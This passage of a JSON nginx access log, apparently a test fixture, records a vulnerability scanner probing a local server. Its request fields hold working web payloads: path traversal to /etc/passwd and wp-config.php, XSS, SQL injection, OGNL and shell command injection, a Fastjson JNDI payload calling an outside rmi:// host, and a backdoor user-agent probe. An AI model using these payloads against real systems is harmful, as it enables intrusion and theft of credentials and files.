/https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"amty_hidden=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sapi/debug/default/view HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229KBxZ7BBeMdvXMWs5zM5LH2Gzm.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29KBxjYbcTnT0CaDzPfq5Q6erhI'); INSERT INTO extra_field_options(option_value) VALUES ('29KBxjYbcTnT0CaDzPfq5Q6erhI'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29KBxjYbcTnT0CaDzPfq5Q6erhI', 16,0) ON DUPLICATE KEY UPDATE tag='29KBxjYbcTnT0CaDzPfq5Q6erhI', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28bc0smpvbbtig07h0o4ixbcufi7pwn.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sensorlist.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29KBxZ7BBeMdvXMWs5zM5LH2Gzm.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/img/favicon-32x32.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /password_change.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/auth/roles HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 